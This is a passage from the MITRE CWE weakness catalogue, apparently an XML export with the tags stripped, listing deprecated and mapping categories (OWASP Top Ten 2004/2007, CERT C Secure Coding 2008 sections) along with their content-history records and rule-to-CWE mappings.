organizing the Development View (CWE-699), but it introduced unnecessary complexity and depth to the resulting tree. + + Prohibited + This CWE has been deprecated. It is also a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See the summary, which might have suggestions for other CWEs to consider. + + + + + + + + Landwehr + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Description, Name, Relationships, Taxonomy_Mappings, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Other + Other Intentional, Nonmalicious Weakness + + + + This category has been deprecated as it was originally used for organizing the Development View (CWE-699), but it introduced unnecessary complexity and depth to the resulting tree. + + Prohibited + This CWE has been deprecated. It is also a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See the summary, which might have suggestions for other CWEs to consider. + + + + + + + + Landwehr + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-07-27 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Maintenance_Notes, Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Description, Maintenance_Notes, Name, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Inadvertent + Inadvertently Introduced Weakness + + + + This entry has been deprecated. It was originally used for organizing the Development View (CWE-699) and some other views, but it introduced unnecessary complexity and depth to the resulting tree. + + Prohibited + This CWE has been deprecated. It is also a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See the summary, which might have suggestions for other CWEs to consider. + + + + + + + + CWE Community + 2006-07-19 + Draft 3 + 2006-07-19 + Submitted by members of the CWE community to extend early CWE versions + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Description, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Name, Relationships, Taxonomy_Mappings, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + .NET Environment Issues + + + + Weaknesses in this category are related to concurrent use of shared resources. + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Community + 2006-07-19 + Draft 3 + 2006-07-19 + Submitted by members of the CWE community to extend early CWE versions + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This entry has been deprecated. It was originally used for organizing the Development View (CWE-699) and some other views, but it introduced unnecessary complexity and depth to the resulting tree. + + Prohibited + This CWE has been deprecated. It is also a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See the summary, which might have suggestions for other CWEs to consider. + + + + + + + + CWE Community + 2006-07-19 + Draft 3 + 2006-07-19 + Submitted by members of the CWE community to extend early CWE versions + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes + + + CWE Content Team + MITRE + 2010-04-05 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-09-27 + updated Other_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2017-11-08 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Name, Relationship_Notes, Relationships, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Often Misused: Arguments and Parameters + + + + Weaknesses in this category are related to incorrectly written expressions within code. + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Community + 2006-12-15 + Draft 5 + 2006-12-15 + Submitted by members of the CWE community to extend early CWE versions + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships + + + CWE Content Team + MITRE + 2009-07-27 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category has been deprecated. It covered a very low level of abstraction based on operating system, which was not useful for any existing view. + + Prohibited + This CWE has been deprecated. It is also a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See the summary, which might have suggestions for other CWEs to consider. + + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Description, Name, Relationships, Type + + + CWE Content Team + MITRE + 2021-03-15 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + UNIX Path Link Problems + + + + This category has been deprecated. It covered a very low level of abstraction based on operating system, which was not useful for any existing view. + + Prohibited + This CWE has been deprecated. It is also a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See the summary, which might have suggestions for other CWEs to consider. + + + + + + + + CWE Community + 2006-07-19 + Draft 3 + 2006-07-19 + Submitted by members of the CWE community to extend early CWE versions + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Description, Name, Relationships, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Windows Path Link Problems + + + + This category has been deprecated. It was not actively maintained, and it was not useful to stakeholders. It was originally created before CWE 1.0 as part of view CWE-631, which was a simple example of how views could be structured within CWE. + + Prohibited + This CWE has been deprecated. It is also a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See the summary, which might have suggestions for other CWEs to consider. + + + + + + + + CWE Community + 2007-10-01 + Draft 7 + 2007-10-01 + Submitted by members of the CWE community to extend early CWE versions + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships + + + CWE Content Team + MITRE + 2009-07-27 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Description, Name, Relationships, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Weaknesses that Affect Files or Directories + + + + This category has been deprecated. It was not actively maintained, and it was not useful to stakeholders. It was originally created before CWE 1.0 as part of view CWE-631, which was a simple example of how views could be structured within CWE. + + Prohibited + This CWE has been deprecated. It is also a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See the summary, which might have suggestions for other CWEs to consider. + + + + + + + + CWE Content Team + MITRE + 2007-10-01 + Draft 7 + 2007-10-01 + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships + + + CWE Content Team + MITRE + 2009-05-27 + updated Relationships + + + CWE Content Team + MITRE + 2009-07-27 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Description, Name, Relationships, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Weaknesses that Affect Memory + + + + This category has been deprecated. It was not actively maintained, and it was not useful to stakeholders. It was originally created before CWE 1.0 as part of view CWE-631, which was a simple example of how views could be structured within CWE. + + Prohibited + This CWE has been deprecated. It is also a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See the summary, which might have suggestions for other CWEs to consider. + + + + + + + + CWE Content Team + MITRE + 2007-10-01 + Draft 7 + 2007-10-01 + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Description, Name, Relationships, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Weaknesses that Affect System Processes + + + + This category has been deprecated as it was found to be an unnecessary abstraction of platform specific details. Please refer to the category CWE-632 and weakness CWE-66 for relevant relationships. + + Prohibited + This CWE has been deprecated. It is also a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See the summary, which might have suggestions for other CWEs to consider. + + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Description, Name, Relationships, Type + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2021-03-15 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Windows Virtual File Problems + + + + This category has been deprecated as it was found to be an unnecessary abstraction of platform specific details. Please refer to the category CWE-632 and weakness CWE-66 for relevant relationships. + + Prohibited + This CWE has been deprecated. It is also a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See the summary, which might have suggestions for other CWEs to consider. + + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Affected_Resources, Applicable_Platforms, Description, Name, Relationships, Type + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2021-03-15 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Mac Virtual File Problems + + + + Weaknesses in this category are related to the A1 category in the OWASP Top Ten 2007. + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2008-09-09 + 1.0 + 2008-09-09 + + + CWE Content Team + MITRE + 2009-12-28 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A2 category in the OWASP Top Ten 2007. + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2008-09-09 + 1.0 + 2008-09-09 + + + CWE Content Team + MITRE + 2009-12-28 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2012-05-11 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2014-02-18 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-05-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A3 category in the OWASP Top Ten 2007. + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2008-09-09 + 1.0 + 2008-09-09 + + + CWE Content Team + MITRE + 2009-12-28 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2012-05-11 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A4 category in the OWASP Top Ten 2007. + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2008-09-09 + 1.0 + 2008-09-09 + + + CWE Content Team + MITRE + 2009-05-27 + updated Relationships + + + CWE Content Team + MITRE + 2009-07-27 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A5 category in the OWASP Top Ten 2007. + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2008-09-09 + 1.0 + 2008-09-09 + + + CWE Content Team + MITRE + 2009-12-28 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A6 category in the OWASP Top Ten 2007. + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2008-09-09 + 1.0 + 2008-09-09 + + + CWE Content Team + MITRE + 2009-12-28 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A7 category in the OWASP Top Ten 2007. + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2008-09-09 + 1.0 + 2008-09-09 + + + CWE Content Team + MITRE + 2009-12-28 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A8 category in the OWASP Top Ten 2007. + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2008-09-09 + 1.0 + 2008-09-09 + + + CWE Content Team + MITRE + 2009-12-28 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2007. + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2008-09-09 + 1.0 + 2008-09-09 + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A10 category in the OWASP Top Ten 2007. + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2008-09-09 + 1.0 + 2008-09-09 + + + CWE Content Team + MITRE + 2009-12-28 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2012-05-11 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-05-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A1 category in the OWASP Top Ten 2004. + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + Veracode + 2008-08-15 + 1.0 + 2008-09-09 + Suggested creation of view and provided mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A2 category in the OWASP Top Ten 2004. + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + Veracode + 2008-08-15 + 1.0 + 2008-09-09 + Suggested creation of view and provided mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A3 category in the OWASP Top Ten 2004. + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + Veracode + 2008-08-15 + 1.0 + 2008-09-09 + Suggested creation of view and provided mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2010-02-16 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A4 category in the OWASP Top Ten 2004. + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + Veracode + 2008-08-15 + 1.0 + 2008-09-09 + Suggested creation of view and provided mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A5 category in the OWASP Top Ten 2004. + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + Veracode + 2008-08-15 + 1.0 + 2008-09-09 + Suggested creation of view and provided mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A6 category in the OWASP Top Ten 2004. + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + Veracode + 2008-08-15 + 1.0 + 2008-09-09 + Suggested creation of view and provided mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A7 category in the OWASP Top Ten 2004. + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + Veracode + 2008-08-15 + 1.0 + 2008-09-09 + Suggested creation of view and provided mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A8 category in the OWASP Top Ten 2004. + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + Veracode + 2008-08-15 + 1.0 + 2008-09-09 + Suggested creation of view and provided mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2004. + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + Veracode + 2008-08-15 + 1.0 + 2008-09-09 + Suggested creation of view and provided mappings + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A10 category in the OWASP Top Ten 2004. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + Veracode + 2008-08-15 + 1.0 + 2008-09-09 + Suggested creation of view and provided mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the Preprocessor (PRE) chapter of the CERT C Secure Coding Standard (2008). + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + In the 2008 version of the CERT C Secure Coding standard, the following rules were mapped to the following CWE IDs: + + CWE-684 PRE09-C Do not replace secure functions with less secure functions + + + + + + CWE Content Team + MITRE + 2008-11-24 + 1.1 + 2008-11-24 + + + CWE Content Team + MITRE + 2017-11-08 + updated Description, Name, Relationship_Notes + + + CWE Content Team + MITRE + 2019-01-03 + updated Description, Name, References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + CERT C Secure Coding Section 01 - Preprocessor (PRE) + CERT C Secure Coding (2008 Version) Section 01 - Preprocessor (PRE) + + + + Weaknesses in this category are related to the rules and recommendations in the Declarations and Initialization (DCL) chapter of the CERT C Secure Coding Standard (2008). + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + In the 2008 version of the CERT C Secure Coding standard, the following rules were mapped to the following CWE IDs: + + CWE-547 DCL06-C Use meaningful symbolic constants to represent literal values in program logic + CWE-628 DCL10-C Maintain the contract between the writer and caller of variadic functions + CWE-686 DCL35-C Do not invoke a function using a type that does not match the function definition + + + + + + CWE Content Team + MITRE + 2008-11-24 + 1.1 + 2008-11-24 + + + CWE Content Team + MITRE + 2017-11-08 + updated Description, Name, Relationship_Notes + + + CWE Content Team + MITRE + 2019-01-03 + updated Description, Name, References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + CERT C Secure Coding Section 02 - Declarations and Initialization (DCL) + CERT C Secure Coding (2008 Version) Section 02 - Declarations and Initialization (DCL) + + + + Weaknesses in this category are related to the rules and recommendations in the Expressions (EXP) chapter of the CERT C Secure Coding Standard (2008). + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + In the 2008 version of the CERT C Secure Coding standard, the following rules were mapped to the following CWE IDs: + + CWE-467 EXP01-C Do not take the size of a pointer to determine the size of the pointed-to type + CWE-468 EXP08-C Ensure pointer arithmetic is used correctly + CWE-476 EXP34-C Ensure a null pointer is not dereferenced + CWE-628 EXP37-C Call functions with the arguments intended by the API + CWE-704 EXP05-C Do not cast away a const qualification + CWE-783 EXP00-C Use parentheses for precedence of operation + + + + + + CWE Content Team + MITRE + 2008-11-24 + 1.1 + 2008-11-24 + + + CWE Content Team + MITRE + 2009-07-27 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Description, Name, Relationship_Notes + + + CWE Content Team + MITRE + 2019-01-03 + updated Description, Name, References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + CERT C Secure Coding Section 03 - Expressions (EXP) + CERT C Secure Coding (2008 Version) Section 03 - Expressions (EXP) + + + + Weaknesses in this category are related to the rules and recommendations in the Integers (INT) chapter of the CERT C Secure Coding Standard (2008). + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + In the 2008 version of the CERT C Secure Coding standard, the following rules were mapped to the following CWE IDs: + + CWE-20 INT06-C Use strtol() or a related function to convert a string token to an integer + CWE-129 INT32-C Ensure that operations on signed integers do not result in overflow + CWE-190 INT03-C Use a secure integer library + CWE-190 INT30-C Ensure that unsigned integer operations do not wrap + CWE-190 INT32-C Ensure that operations on signed integers do not result in overflow + CWE-190 INT35-C Evaluate integer expressions in a larger size before comparing or assigning to that size + CWE-192 INT02-C Understand integer conversion rules + CWE-192 INT05-C Do not use input functions to convert character data if they cannot handle all possible inputs + CWE-192 INT31-C Ensure that integer conversions do not result in lost or misinterpreted data + CWE-197 INT02-C Understand integer conversion rules + CWE-197 INT05-C Do not use input functions to convert character data if they cannot handle all possible inputs + CWE-197 INT31-C Ensure that integer conversions do not result in lost or misinterpreted data + CWE-369 INT33-C Ensure that division and modulo operations do not result in divide-by-zero errors + CWE-466 INT11-C Take care when converting from pointer to integer or integer to pointer + CWE-587 INT11-C Take care when converting from pointer to integer or integer to pointer + CWE-606 INT03-C Use a secure integer library + CWE-676 INT06-C Use strtol() or a related function to convert a string token to an integer + CWE-681 INT15-C Use intmax_t or uintmax_t for formatted IO on programmer-defined integer types + CWE-681 INT31-C Ensure that integer conversions do not result in lost or misinterpreted data + CWE-681 INT35-C Evaluate integer expressions in a larger size 